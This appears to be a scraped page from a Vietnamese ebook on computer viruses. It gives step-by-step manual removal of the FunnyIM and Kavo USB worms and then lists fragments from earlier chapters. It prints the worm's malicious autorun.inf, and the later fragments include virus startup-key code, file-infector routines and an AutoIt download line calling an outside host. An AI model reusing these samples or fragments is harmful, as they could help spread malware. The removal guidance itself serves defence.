giúp bạn bảo vệ hệ thống của thường trực với những nguy hiểm. Vì vậy việc cài một phần
mềm diệt virus tốt sẵn trong máy là điều bạn nên làm
Chương 5 : Tự diệt một số virus

FunnyIM
Hình thức lây nhiễm :
- FunnyIM là một worm lây nhiễm qua USB (Có icon giả dạng thư mục).
- Các thư mục chia sẻ trong cùng mạng nội bộ
- Qua Yahoo Messenger
Đặc điểm đáng chú ý:
- Virus cùng lúc tạo ra 3 tiến trình con và bảo vệ lẫn nhau.
- Tạo khóa khởi động cùng hệ thống là 2 khóa Shell và UserInit (Đã nói phần trên).
Nhận dạng :
Dùng ProcessXP bạn sẽ thấy 3 tiến trình với 3 icon giống nhau (Hình thư mục) đang hoạt
động.
Dùng Autoruns bạn sẽ nhận ra những sửa chửa tại 2 key Shell và UserInit (Đã nói ở
phần trên cuốn sách)
Tiêu diệt :
1. Tiêu diệt các tiến trình
Do các tiến trình của virus tự động bảo vệ lẫn nhau (Khi bạn tiêu diệt 1 trong 3 tiến trình
thì các tiến trình kia sẽ tự gọi lại tiến trình này), vì vậy việc tiêu diệt các tiến trình này
theo cách thông thường là tiêu diệt từng tiến trình là rất khó.
Chúng ta có thể dừng sự hoạt động của các tiến trình (Suspend) rồi tiến hành tiệu diệt
như bình thường.
Mở ProcessXP, chọn lần lượt các tiến trình của virus và Process -> Suspend (Hoặc ấn
chuột phải rồi chọn Suspend). Sau khi Suspend mỗi tiến trình thì chúng sẽ chuyển màu
để báo hiệu cho bạn biết là đã bị dừng (Mặc định sẽ là màu xám).
Cuối cùng bạn lần lượt tiêu diệt các tiến trình (Process -> Kill process, hoặc chuột phải
rồi chọn Kill process).
Với một số dạng virus tạo nhiều tiến trình cùng lúc, ngay cả việc bạn Suspend chúng cũng
không có tác dụng vì chúng tự nhận ra bị Suspend và tự phục hồi.
Với dạng virus này, cách duy nhất bạn làm là phải tiêu diệt gần như liên tục tất cả các tiến
trình do virus tạo ra.
Bạn có thể dùng Process Viewer để làm việc này.
Process Viewer : Là một phần mềm quản lý tiến trình hệ thống tốt, hỗ trợ các tính năng
gần như tương đồng ProcessXP. Ngoài ra còn hỗ trợ xem các chương trình khởi động cùng
hệ thống, diệt đồng thời nhiều tiến trình... Tuy nhiên, các tính năng về quản lý tiến trình
hệ thống thì phần mềm kém hơn ProcessXP.
Để diệt nhiều tiến trình cùng lúc, trong Process Viewer ta thực hiện như sau :
- Bạn giữ phím Ctrl và chọn các tiến trình muốn tiêu diệt (Giống như chọn cùng lúc nhiều
file hay thư mục với các chương trình quản lý file).
- Bạn chọn Process -> Kill (Hoặc nhấn chuột phải và chọn Kill)
- Hộp thoại Kill sẽ xuất hiện. Và bạn chọn Kill để hoàn thành việc tiêu diệt các tiến trình
đã chọn.
2. Xóa các khóa khởi động

Bây giờ bạn cần phải sửa lại các key Shell và UserInit về giá trị ban đầu (Các giá trị hiện
nay là những giá trị đã bị virus thay đổi).
Ở đây tôi sẽ sử dụng registry (Start -> Run... Nhập vào regedit rồi chọn OK).
Bạn có thể truy xuất theo đường dẫn của 2 khóa Shell và UserInit này ở phía trên rồi
phục hồi lại các giá trị như ban đầu. Có một mẹo nhỏ để nhanh chóng tới các khóa này là
bạn mở Autoruns và nháy đúp vào khóa ấy, chương trình sẽ tự động gọi Registry với địa
chỉ của khóa đó.
Bạn nên lưu ý, do 2 khóa Shell và UserInit là 2 khóa khá nhạy cảm nên bạn nên thận
trọng trong từng thao tác với chúng.
3. Xóa các file
Trong suốt quá trình nhận dạng và diệt virus vừa rồi bạn sẽ nhận ra những địa chỉ lưu trữ
virus. Như máy tôi sẽ là các đường dẫn sau :
C:\Windows\system32\sviq.exe
C:\Windows\system\Fun.exe
C:\Windows\system32\dc.exe
C:\Windows\system32\config\Win.exe
C:\Windows\system32\WinSit.exe
Tôi có thể dễ dàng xóa chúng bằng Windows Explorer do các file này không đặt các thuộc
tính ẩn.
4. Phục hồi :
Virus này không phá hoại hay thiết lập gì khác trong hệ thống nên việc diệt chúng trong
máy bạn đã hoàn thành.
Do virus này lây qua USB nên bạn cần thực hiện thao tác diệt chúng trong đĩa USB nếu có
(Bạn xem thêm ở phần trên).
Kavo
Hình thức lây nhiễm :
- Qua USB (Tự tạo file autorun.inf trong đĩa USB để lây nhiễm).
Đặc điểm đáng chú ý :
- Sử dụng kỹ thuật Rootkit (Code inject).Nó tự inject thư viện kavo0.dll vào các tiến trình
đang hoặc động của hệ thống, vì vậy rất tiêu diệt.
- Ngoài việc sử dụng file autorun.inf để lây nhiễm qua đĩa USB, virus còn sử dụng file này
để kích hoạt mình khi đã nhiễm vào máy nạn nhân bằng cách tạo file này trong các ổ đĩa
của hệ thống. Nếu bạn truy cập vào các ổ đĩa này theo cách thông thường (Nháy đúp) thì
chắc chắn bạn sẽ kích hoạt virus.
- Hiện nay ở Việt Nam có một số biến thể của loại virus này, bản thân tôi, khi đang viết
cuốn sách này cũng gặp một biến thể mới của chúng. Trong phần này tôi sẽ tiến hành diệt
trên biến thể này.
Nhận dạng :
Dùng autoruns (Hay các chương trình quản lý chương trình khởi động cùng hệ thống
khác) sẽ nhận ra sự xuất hiện của một khóa tên là kava.
Do lỗi kỹ thuật của người lập trình ra virus nên khi máy bạn nhiễm virus này thì bạn
không thể đăng nhập vào Yahoo Messenger.
Khi ấn chuột phải vào các ổ đĩa của hệ thống, bạn sẽ nhận ra một tùy biến lạ (Trong biến
thể tôi đang đang thử nghiệm thì tùy biến lạ này không xuất hiện).
Virus sẽ inject thư viện kavo0.dll vào các tiến trình đang hoạt động. Để nhận ra bạn có
thể sử dụng một số chương trình có cho phép xem các thư viện mà tiến trình sử dụng khi
hoạt động (Tôi sử dụng phần mềm ProcessXP).
Tiêu diệt :
1. Tiêu diệt tiến trình
Cũng như các virus khác, việc đầu tiên bạn phải làm để tiêu diệt được virus này là bạn
phải dừng được hoạt động của virus. Tuy nhiên, virus không chạy dưới dạng một tiến trình
như các chương trình khác để bạn dễ dàng tiêu diệt nó.
Để dừng hoạt động của chúng bạn phải ngừng việc thư việc kavo0.dll inject trong các tiến
trình khác.
Việc dừng hoạt động của loại virus như các phương pháp hướng dẫn hiện nay trên các diễn
đàn tin học đã nói rất nhiều. Cách này đơn giản, hiệu quả tuy nhiên theo tôi nhận thấy thì
việc sử dụng rập khuôn chúng sẽ không giải quyết được những virus tương tự như phức
tạp hơn. Vì vậy tôi sẽ trình bày cả 2 cách tiêu diệt virus này.
Cách 1 :
Bạn có thể dùng MSConfig hay bất cứ chương trình quản lý khởi động nào để bỏ khóa
khởi động mang tên kava.
Ở đây tôi sẽ sử dụng Autoruns.
Sau đó khởi động lại máy tính.
Lúc này virus đã không còn hoạt động trên máy tính của bạn.
Cách 2 :
Bạn có thể nhận ra rằng, cách dừng tiến trình hoạt động của virus như trên là khá “may
rủi” vì nếu virus đó liên tục tiến hành ghi key trong registry thì việc làm của bạn như cách
1 chỉ là vô ích.
Inject thực chất là việc đưa một đoạn mã của chương trình thông qua thư viện liên kết
động (DLL) vào một tiến trình đang chạy. Việc này giúp che giấu hoạt động của chương
trình sử dụng inject.
Việc dừng hoạt động của virus lúc này chính là việc “bóc tách” thư viện này ra khỏi các
tiến trình.
Đâu tiên, tôi sử dụng ProcessXP để xác định các tiến trình bị thư viện kavo0.dll inject.
Như ở máy tôi, các tiến trình bị thư viện này inject là :
Explorer.exe
Unikey.exe
Wmplayer.exe
Winword.exe
Bạn nên chú ý phân biện việc inject này chỉ là sự nhiễm mã độc của virus trong bộ nhớ
(memory) của các tiến trình, chứ không phải là bản thân các file ấy bị nhiễm virus. Vì vậy,
với các file này chúng ta chỉ cần “bóc tách” thư viện kavo0.dll ra mà thôi chứ không xóa
chúng khỏi hệ thống.
Bước tiếp theo là bước “bóc tách” như tôi đã phân tích ở trên. Tôi đã thử một số phần
mềm quản lý tiến trình khác nhau thì chỉ mới nhận thấy phần mềm IceSword và công cụ
[FireLion] Process Manager (Nằm trong [FireLion] All Tools In One 1.0 đã nói ở
phần trên cuốn sách) có tính năng này.
Công cụ IceSword rõ ràng chuyên nghiệp và nhiều tính năng hơn, nó liệt kê nhiều thông
tin hơn về tiến trình. Tuy nhiên hoạt động chậm hơn [FireLion] Process Manager.
Sau đây là các bước để “bóc tách” thư viện kavo0.dll ra khỏi các tiến trình :
Với [FireLion] Process Manager :
Bạn lần lượt chọn các tiến trình đã xác định là bị inject, rồi nhìn trong khung hiển thị các
thư viện được sử dụng bên dưới để tìm thư viện kavo0.dll. Sau đó chọn thư viện
kavo0.dll và bấm nút Unload.
Với IceSword :
Khởi động IceSword, chọn thẻ Functions -> Process.
Bạn lần lượt ấn chuột phải chọn vào từng tiến trình mà bạn đã xác định bị inject để xuất
hiện menu tương ứng và chọn Module Information.
Hộp thoại Module Information sẽ xuất hiện. Bạn tìm đến giá trị chứa thư viện kavo0.dll
và chọn Unload.
Bạn chú ý :
- Thực hiện Unload thao tác này mà không bỏ sót tiến trình mà bạn đã xác định bị inject
nào.
- Đồng thời bạn cũng nên để ý là thư viện kavo0.dll có khả năng sẽ được đổi tên tùy từng
lúc của virus, cụ thể là khi diệt nó bằng IceSword thì thư viện này tên là kavo1.dll )
2. Tiêu diệt virus
Sau khi thực hiện xong bước 1. Virus đã dừng hoạt động, tuy nhiên như vậy không tức là
nó đã bị tiêu diệt, bạn còn cần thực hiện các thao tác sau.
Bạn thực hiện các thao tác để xóa các tập tin ẩn sau trong hệ thống :
C:\Windows\system32\kavo0.dll
C:\Windows\system32\kavo.exe
Để thực hiện việc xóa này, bạn làm các thao tác như đã trình bày ở phần trên của cuốn
sách này nhằm có thể hiển thị các tập tin, thư mục ẩn và xóa chúng. Tôi sử dụng Total
Commander để làm việc này.
Tháo tác tiếp theo là bạn truy cập vào từng đĩa cứng trong máy bạn để tìm file
autorun.inf. Bạn hãy đọc thông tin bên trong chúng (Bạn có thể dùng Notepad để làm
việc này). Ví dụ ở máy tôi, file này sẽ có nội dung như sau :
;0s3iJw2jnDS95koalksaCwsKdD4r95r
[AutoRun]
;3l43wisKlfp7i7
open=0wk2.cmd
;KscD2Kl0LDakdZrs8aj2XDwa4kkfo5Dr4Fe2sdmqdiIof0cqlwwDkaalaSJLKLJ34s
shell\open\Command=0wk2.cmd
;8iadi3iA4A2ika44wDL8jk41k3rr0LLfassLiDkf
shell\open\Default=1
;Sjl2r2lwai4L4wi1DD34o21e0KdKrk2aAd2ows0k9miwJ75kpKDk79S8flL23Ask5ksDK0Adia2
3Kf4a4da
shell\explore\Command=0wk2.cmd
;1sKAsf4jiliiwqlA3adlp3oldS5krwiqLowCac7eajdSK
Chúng ta dễ dàng nhận ra, file 0wk2.cmd sẽ được chạy khi bạn nháy đúp vào ổ đĩa tương
ứng chứa file autoruns.inf.
Vậy bây giờ bạn xóa file autoruns.inf và file 0wk2.cmd trong mỗi ổ đĩa trong máy
mình.
Sở dĩ tôi muốn bạn phải thực hiện thao tác động file autorun.inf là để bạn không bị rập
khuôn một cách cứng nhắc khi diệt virus. Thực ra với biến thể virus kavo cũ mà tôi gặp
thì nó sẽ tạo các file ntdelect.com trong mỗi phân vùng ổ cứng, nếu bạn rập khuôn một
cách cứng nhắc “công thức” diệt virus kavo là phải tìm và xóa file ntdelect.com như trên
thì đồng nghĩa với biến thể khác (Như biến thể tôi đang gặp) bạn sẽ không diệt được nó.
Chú ý : Trong suốt quá trình diệt virus, bạn không được phép truy cập dữ liệu trong các ổ
đĩa trong Windows Explorer bằng cách nháy đúp, thay vào đó bạn hãy sử dụng cách tôi
đã giới thiệu ở phần Tránh Autorun của USB. Hoặc một giải pháp an toàn là sử dụng các
chương trình quản lý file thay thế (Như Total Commander).
Tài liệu tham khảo :
1. www.wikipedia.com
2. www.quantrimang.com
3. www.virusvn.com
4. www.allapi.net
5. www.hvaonline.net
6. www.vnsecuity.com
7. www.pcworld.com.vn
8. www.download.com.vn

Tong Quan Virus

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Tong Quan Virus

Uploaded by

Copyright:

Available Formats

Lê Nguyên Dũng

Chương 1 : Một số định nghĩa cơ bản

Chương 5 : Tự diệt một số virus

Virus máy tính là gì ?

Lịch sử virus máy tính

Một số đuôi mở rộng có khả năng bị virus tấn công

 .bat: Microsoft Batch File (Tệp xử lí theo lô)

Phân loại virus

Chương 2 : Virus làm gì

I. Tạo khóa khởi động :

I.1. Khởi động hợp pháp :

Cách này worm,trojan cũng thường sử dụng.

‘Khai báo các hằng số

Private Sub Form_Load()

‘Đoạn mã xác định đường dẫn virus

‘Thao tác xóa key khởi động

I.1.b Phương pháp sử dụng thư mục khởi động :

Sửa đổi Key trong Regedit :

Đường dẫn key : HKEY_LOCAL_MAHINE\SOFTWARE\Microsoft\Windows

Ý nghĩa các key

‘Khai báo các hằng số

Function WindowsDir() As String

Private Sub Form_Load()

‘Khởi tạo giá trị cho biến

I.1.c. Một số key khác

Có thể có những file khác:

[HKEY_CLASSES_ROOT\exefile\shell\open\command] ="\"%1\" %*"

‘Xác định đường dẫn virus

‘Code bởi DungCoi

Private Sub TimThuMuc(ThuMuc As String)

Private Function TonTai(filename) As Boolean

Dim AppVirus As String

Set rdd = fso.opentextfile("C:\clog.tmp")

4. Qua các dịch vụ IM

Sau đây là một số khái niệm chính về IM

Giao thức - phần mềm

1. Bạn nhiễm chúng ta sao ?

; <AUT2EXE VERSION: 3.1.1.112>

; Script Start - Add your code below here

InetGet ( "Http://xrobots.net/Gift/Version.txt" ,@WindowsDir &

RegWrite("HKEY_CURRENT_USER\SOFTWARE\microsoft\Int ernet Explorer\Main",

;;Doan na`y xoa di de doan ma khong bi loi dung

if ($count = 2) or ($count = 6) or ($count = 9) or ($count = 12) or ($count

Phân tích các công việc mà virus thực hiện :

Const size As Integer = 18432

Private Declare Function OpenProcess Lib "kernel32" _

Private Sub Form_Load()

On Error Resume Next

On Error GoTo Fin

‘Lưu toàn bộ dữ liệu của virus vào một biến

While victim <> ""

If LCase(App.Path & "\" & App.EXEName & ".exe") _

‘Lưu dữ liệu file sẽ bị lây nhiễm vào 1 biến

chck = Mid(varray, Len(varray))

If LCase(chck) <> "^" Then

Open victim For Binary Access Write As #Free

Do While iExit = STILL_ACTIVE

Một số hoạt động phá hoại khác

Sau đây là đoạn mã KeyLog căn bản :

BackDoor (Cửa hậu)

Chương 3 : Nhận dạng và tiêu diệt

I. Làm sao để nhận dạng virus ?

III. Quản lý các chương trình khởi động của hệ thống

Nhận dạng Rootkit